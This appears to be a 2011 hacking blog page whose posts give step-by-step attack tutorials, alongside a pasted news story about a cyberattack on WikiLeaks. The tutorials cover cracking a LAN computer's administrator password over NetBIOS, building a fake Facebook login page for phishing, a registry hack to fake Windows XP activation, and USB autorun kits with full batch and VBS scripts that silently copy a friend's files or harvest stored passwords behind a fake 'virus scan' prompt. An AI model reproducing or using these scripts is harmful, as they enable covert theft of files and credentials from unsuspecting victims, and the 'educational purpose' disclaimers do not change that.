Wikileaks Under Attack

The WikiLeaks website crashed Tuesday in an apparent cyberattack after the accelerated publication of tens of thousands of once-secret State

Destroy Ur Friends PC Using Virus

In this post we'll take a look on how to create a deadly computer virus to destroy your enemy or victim's PC.

USB 3.0 Evolution xD

USB 3.0 > Usb 2.0 > Usb 1.0 xD

MEet Top ten techies Who changed World around Us

Top Ten Techies...

Steal Your Frnds Password using Flash Drive

Yes Ew Heard it Correct...CLick to know the trick :)

Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Sunday, 20 November 2011

Hack Computers Inside LAN Network

Today,I will write about hacking computer inside the LAN network.

This technique will be taking advantage of Port 139.

Most of the time,Port 139 will be opened.

First of all,I will do a port scanning at the target computer which is 192.168.40.128.

This computer is inside my LAN network.

I will scan it using Nmap.

[Image: 1_13.jpg]

I get the result and it shows Port 139 is opened up for me.

Now you will need both of these tools:
** USER2SID & SID2USER
** NetBios Auditing Tool

You can get both of them on the Internet.

After you get both of them,put them in the C:\ directory.

[Image: 2_1.jpg]

You now need to create a null session to the target computer.

[Image: 3_3.jpg]

Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER.

We will first using USER2SID to get the ID.

[Image: 4_10.jpg]

We will test against the Guest account because Guest account is a built in account.

After we get the ID,we need to do some modification on the ID.

We take the ID we get from the guest account and modified it become
"5 21 861567501 1383384898 839522115 500".

Please leave out the S-1-,leave out all the - too.

[Image: 5_8.jpg]

Now you will see that you get the username of the Administrator account.

In this case,the Administrator account is Administrator.

Create a text file called user.txt and the content will be the username of the Admin account.

[Image: 6.jpg]

Prepare yourself a good wordlist.

[Image: 7.jpg]

Now put both of them in the same directory with the NetBios Auditing Tool.

[Image: 8.jpg]

Now we are going to crack the Admin account for the password in order to access to the target computer.

Browse to the NetBios Auditing Tool directory.

[Image: 9_1.jpg]

Press on enter and the tool will run through the passlist.

[Image: 10.jpg]

In this case,I have get the password.

In order to proof that I can get access to the target computer using this password.

[Image: 11.jpg]

After you press enter,it will prompt you for the username and password.

[Image: 12_6.jpg]

Therefore,just input them inside the prompt and continue.

[Image: 13.jpg]

Target C drive will be on your screen.

[Image: 14.jpg]

In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.

The download link of the tools will be:
Download Tools.rar

How to Trace an IP Address

Whenever you get online,your computer is assigned an IP address. If you connect through the router, all of the computers on that network will share a similar Internet Protocol address; though each computer on the network will have a unique Internet address. An IP address is the Internet Protocol (IP) address given to every computer connected to the Internet. An IP address is needed to send information, much like a street address or P.O. box is needed to receive regular mail. Tracing an IP address is actually pretty straightforward, and even though it's not always possible to track down a specific individual, you can get enough information to take action and file a complaint.
For example, if there was some guy claiming to be Chuck Norris, and tried to get personal information from your Gmail account, you could view his IP address, and then track him. Here's how:

STEP:

Click on Start>Accessories>Command Prompt.

Type PING [URL] or TRACERT [URL] - example: PING http://www.facebook.com/.


The IP address should appear beside the website name. The format of an IP address is numeric, written as four numbers separated by periods. The format of an IP address is numeric, written as four numbers separated by periods. It looks like 71.238.34.104 or similar.
<br

To find the IP of an e-mail sent to you, investigate the message's "headers." The steps to finding message headers depend on your email client.

Gmail for example:
  • Log in to Gmail.

  • Open the message you'd like to view headers for.

  • Click the down arrow next to Reply, at the top of the message pane.

  • Select Show Original.


Use the methods described above to obtain the IP number you wish to check.

  • 2
    Go to a website that will allow you to look up IP address information. Google "IP Lookup" or "IP Geolcation" for a large list of sites that will freely offer this service.



  • 3


  • Understand what you can and cannot learn from the IP address:
    • Which internet service provider (ISP) the user is using. In some cases this may be the user's company (e.g. Ford.com). In other cases it may be just one of the large ISPs such as ATT or Comcast.
    • The approximate physical location of the user (e.g. Palo Alto, California.)
    • Recognize that usually you will not learn the actual name of the person doing at that IP address (e.g. Joe Smith). ISPs will typically only release such information under a court order.



  • Wednesday, 26 October 2011

    Lets talk about hacking e-mail using hacking softwares. But, Is it really Possible?


    1. There is no ready made software that can hack emails and get you the password just with a click of a button. So if you come accross any website that claims to sell such softwares, I would advise you not to trust them.
    2. Never trust any email hacking service that claims to hack any email for just $100 or $200. Most of them are no more than a scam.
    3. With my experience, I can tell you that there exists only 2 foolproof methods for hacking email. All the other methods are simply scam or don’t work.
    1. Keylogging - Using a Keylogger
    2. Phishing

    What is a Keylogger :
    A keylogger is a hardware device or a software program that records the real time activity of a computer user including the keyboard keys they press.
    Keyloggers are used in mainly used IT organizations to troubleshoot technical problems with computers and business networks. Keyloggers can also be used by a family (or business) to monitor the network usage of people without their direct knowledge. Finally, malicious individuals may use keyloggers on public computers to steal passwords or credit card information.

    EAXAMPLE: REFROG KEYLOGGER

    Phishing :-
    Phishing is an attempt to criminally and fraudulently acquire sensitive information, such as username, passwords and credit card details, by appearing as a trustworthy entity in an electronic communication. eBay, PayPal and other online banks are common targets Phishing is typically carried out by email or instant messaging and often directs users to enter details at a website.

    How to make fake login page of any site you want


    No need to download any software to make fake pages.
    Just create yourself:
    Let us take an example of making fake login page of FB:
    Steps:
    1. Go for the site you want to create fake login page...
    2. Try to login in that site... When login window opens then save its source.
    3. Go to the directory where you downloaded that page.
    4. Create an empty .txt file in that folder/directory and give it a namepass.txt.
    5. Open the original page of the site and start editing it with NOTEPAD.
    6. Try finding this code: action.php changes it to pass.php...
    Now you are done!  You have successfully created a 'fake login page'
    NOTE:
    In every social networking sites follow the same process to make fake login page.
    Do not think that it is only for FB.
    People do not use this to harm others.
    It is only for educational purpose & to make our users aware!

    How to Make Windows XP Genuine


    One:  - Open Notepad from Start Menu and paste the following code in your notepad program.
    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion]
    “CurrentBuild”=”1.511.1 () (Obsolete data – do not use)”
    “ProductId”=”55274-640-1011873-23081″
    “DigitalProductId”=hex:a4,00,00,00,03,00,00,00,35,35,32,37,34,2d,36,34,30,2d,
    31,30,31,31,38,37,33,2d,32,33,30,38,31,00,2e,00,00,00,41,32,32,2d,30,30,30,
    30,31,00,00,00,00,00,00,00,86,56,4e,4c,21,1b,2b,6a,a3,78,8e,8f,98,5c,00,00,
    00,00,00,00,dd,da,47,41,cc,6b,06,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
    00,00,00,00,00,00,00,00,00,00,00,38,31,30,32,36,00,00,00,00,00,00,00,b5,16,
    00,00,83,83,1f,38,f8,01,00,00,f5,1c,00,00,00,00,00,00,00,00,00,00,00,00,00,
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,66,e5,70,f3
    “LicenseInfo”=hex:33,b7,21,c1,e5,e7,cd,4b,fd,7c,c6,35,51,fd,52,57,17,86,3e,18,
    d3,f4,8c,8e,35,32,7b,d1,43,8d,61,38,60,a4,ca,55,c9,9a,35,17,46,7a,4f,91,fc,
    4a,d9,db,64,5c,c4,e2,0f,34,f3,ea
    [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWPAEvents]
    “OOBETimer”=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd
    2. Now save the file on the name of Genuine.reg (Make sure to save it with .reg extension).  Save the file on Desktop
    Three:  - Now close the file and go to Desktop and double click on the file you just saved.
    Four:  - Guys your Windows XP is now genuine.  Restart your windows and that is it.

    Saturday, 3 September 2011

    How to secretly copy (steal) files from a computer to a USB Flash drive




    Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so badly that you are willing to steal from him. He deserves it anyway.







    To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.


    Sneaky, isn't it? So let us prepare such a sinister USB Flash drive.
    STEP 1


    Open Notepad (I recommend Notepad++) and copy-paste the following lines.


    [autorun]

    icon=drive.ico

    open=launch.bat

    action=Click OK to Run

    shell\open\command=launch.bat


    Save this as autorun.inf


    The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.


    The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.


    The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.
    STEP 2


    Open Notepad again and copy-paste the following lines


    @echo off

    :: variables

    /min

    SET odrive=%odrive:~0,2%

    set backupcmd=xcopy /s /c /d /e /h /i /r /y

    echo off

    %backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"

    %backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"

    %backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"

    @echo off

    cls


    Save this as file.bat


    This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.


    The first file path "%USERPROFILE%\pictures" – is the target.

    The second file path "%drive%\all\My pics" – is the destination.
    STEP 3


    Open Notepad once again and copy-paste the following line.


    CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False


    Save this as invisible.vbs


    This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.
    STEP 4


    Open Notepad one last time and copy-paste the following line.


    wscript.exe \invisible.vbs file.bat


    Save this as launch.bat


    This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.
    STEP 5


    Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.


    This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.

    WikiLeaks site is under attack








    The WikiLeaks website crashed Tuesday in an apparent cyberattack after the accelerated publication of tens of thousands of once-secret State Department cables by the anti-secrecy organization raised new concerns about the exposure of confidential U.S. embassy sources.


    "WikiLeaks.org is presently under attack," the group said on Twitter late Tuesday. One hour later, the site and the cables posted there were inaccessible.


    WikiLeaks updated its Twitter account to say that it was "still under a cyberattack" and directed followers to search for cables on a mirror site or a separate search system, cablegatesearch.net.


    The apparent cyberattack comes after current and former American officials said the recently released cables — and concerns over the protection of sources — are creating a fresh source of diplomatic setbacks and embarrassment for the Obama administration. It was not immediately clear who was behind the attack.


    The Associated Press reviewed more than 2,000 of the cables recently released by WikiLeaks. They contained the identities of more than 90 sources who had sought protection and whose names the cable authors had asked to protect.


    Officials said the disclosure in the past week of more than 125,000 sensitive documents by WikiLeaks, far more than it had earlier published, further endangered informants and jeopardized U.S. foreign policy goals. The officials would not comment on the authenticity of the leaked documents but said the rate and method of the new releases, including about 50,000 in one day alone, presented new complications.


    "The United States strongly condemns any illegal disclosure of classified information," State Department spokeswoman Victoria Nuland said. "In addition to damaging our diplomatic efforts, it puts individuals' security at risk, threatens our national security and undermines our effort to work with countries to solve shared problems. We remain concerned about these illegal disclosures and about concerns and risks to individuals.


    "We continue to carefully monitor what becomes public and to take steps to mitigate the damage to national security and to assist those who may be harmed by these illegal disclosures to the extent that we can," she told reporters.


    Neither Nuland nor other current officials would comment on specific information contained in the compromised documents or speculate as to whether any harm caused by the new releases would exceed that caused by the first series of leaks, which began in November and sent the administration into a damage-control frenzy.


    WikiLeaks fired back at the criticism even as its website came under cyberattack.


    "Dear governments, if you don't want your filth exposed, then stop acting like pigs. Simple," the group posted on Twitter.


    Some officials noted that the first releases had been vetted by media organizations who scrubbed them to remove the names of contacts that could be endangered. The latest documents have not been vetted in the same way.


    "It's picking at an existing wound. There is the potential for further injury," said P.J. Crowley, the former assistant secretary of state for public affairs who resigned this year after criticizing the military's treatment of the man suspected of leaking the cables to WikiLeaks. "It does have the potential to create further risk for those individuals who have talked to U.S. diplomats. It has the potential to hurt our diplomatic efforts and it once again puts careers at risk."


    Crowley set up a crisis management team at the State Department to deal with the matter and said officials at the time went through the entire collection of documents they believed had been leaked and warned as many named sources as possible, particularly in authoritarian countries, that their identities could be revealed. A handful of them were relocated, but Crowley said others may have been missed and some could not be contacted because the effort would have increased the potential for exposure.


    The new releases "could be used to intimidate activists in some of these autocratic countries," he said. He said he believed that "any autocratic security service worth its salt" probably already would have the complete unredacted archive of cables but added that the new WikiLeaks releases meant that any intelligence agency that did not "will have it in short order."


    WikiLeaks insisted it was "totally false" that any WikiLeaks sources have been exposed and appeared to suggest the group itself was not even responsible for releasing unredacted cables.


    The group seemed to taunt U.S. officials and detractors in yet another Twitter message late Tuesday, asking what they will do "when it is revealed which mainstream news organization disclosed all 251k unredacted cables."


    The AP review included all cables classified as "confidential" or "secret," among the more than 50,000 recently released by WikiLeaks. In them, the AP found the names of at least 94 sources whose identities the cable authors asked higher-ups to "protect" or "strictly protect." Several thousand other of the recently published cables were not classified and did not appear to put sources in jeopardy.


    The accelerated flood of publishing partly reflects the collapse of the unusual relationships between WikiLeaks and news organizations that previously were cooperating with it in exchange for being given copies of all the uncensored State Department messages.


    Initially, WikiLeaks released only a trickle of documents at a time from a trove of a quarter-million, and only after considering advice from five news organizations with which it chose to share all of the material. The news organizations advised WikiLeaks on which documents to release publicly and what redactions to make to those documents. The Associated Press was not among those news organizations.


    In recent months, those relationships have soured noticeably. WikiLeaks complained Tuesday that a reporter who wrote about the group's efforts for The New York Times, one of the news organizations it was working with closely, was a "sleazy hack job." It also said a reporter for Guardian in Britain, another of its former partners in the release of documents, had exhibited a "tawdry vendetta" against WikiLeaks

    Saturday, 20 August 2011

    How to Steal your friends Passwords Using a USB Drive!





    MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.



    Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

    Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.



    IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0



    Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…



    PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.



    Here is a step by step procedre to create the password hacking toolkit.



    NOTE: You must temporarily disable your antivirus before following these steps.



    1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.



    ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.



    2. Create a new Notepad and write the following text into it



    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan



    save the Notepad and rename it from



    New Text Document.txt to autorun.inf






    Now copy theautorun.inf file onto your USB pendrive.



    3. Create another Notepad and write the following text onto it.



    start mspass.exe /stext mspass.txt



    start mailpv.exe /stext mailpv.txt



    start iepv.exe /stext iepv.txt



    start pspv.exe /stext pspv.txt



    start passwordfox.exe /stext passwordfox.txt



    save the Notepad and rename it from



    New Text Document.txt to launch.bat



    Copy the launch.bat file also to your USB drive.



    Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps



    1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).



    2. In the pop-up window, select the first option (Perform a Virus Scan).



    3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.



    4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.



    This hack works on Windows 2000, XP,Vista and 7



    NOTE: This procedure will only recover the stored passwords (if any) on the Computer

    .

    DISLAIMER: For education purpose only






    Adithya

    Share

    Twitter Delicious Facebook Digg Stumbleupon Favorites